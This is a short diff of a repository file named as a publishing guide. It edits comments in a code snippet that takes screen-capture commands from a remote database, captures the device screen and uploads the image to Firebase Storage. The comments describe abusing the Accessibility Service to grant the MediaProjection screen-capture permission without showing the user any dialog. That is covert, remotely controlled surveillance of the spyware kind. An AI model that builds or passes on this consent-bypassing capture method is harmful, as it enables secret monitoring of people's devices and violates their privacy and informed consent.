AlveeShariar2/studio/PUBLISHING_GUIDE.md

     // 1.
 Mark as processing to avoid duplicate runs commandRef.update({'status': 'processing'});

     // 2.
-Invoke native code (Kotlin/Java) to capture the screen
+Invoke native code (Kotlin/Java) to capture the screen.
-    // This requires MediaProjection API, which is initiated by the Accessibility Service
+    // The Accessibility Service can be used to grant the MediaProjection API
-    // to avoid showing a user-facing permission dialog. final bool success = await NativeChannel.invokeMethod('captureScreen');
+    // permission without showing a user-facing dialog. final bool success = await NativeChannel.invokeMethod('captureScreen');

     // 3.
 Upload the image to Firebase Storage and update the command status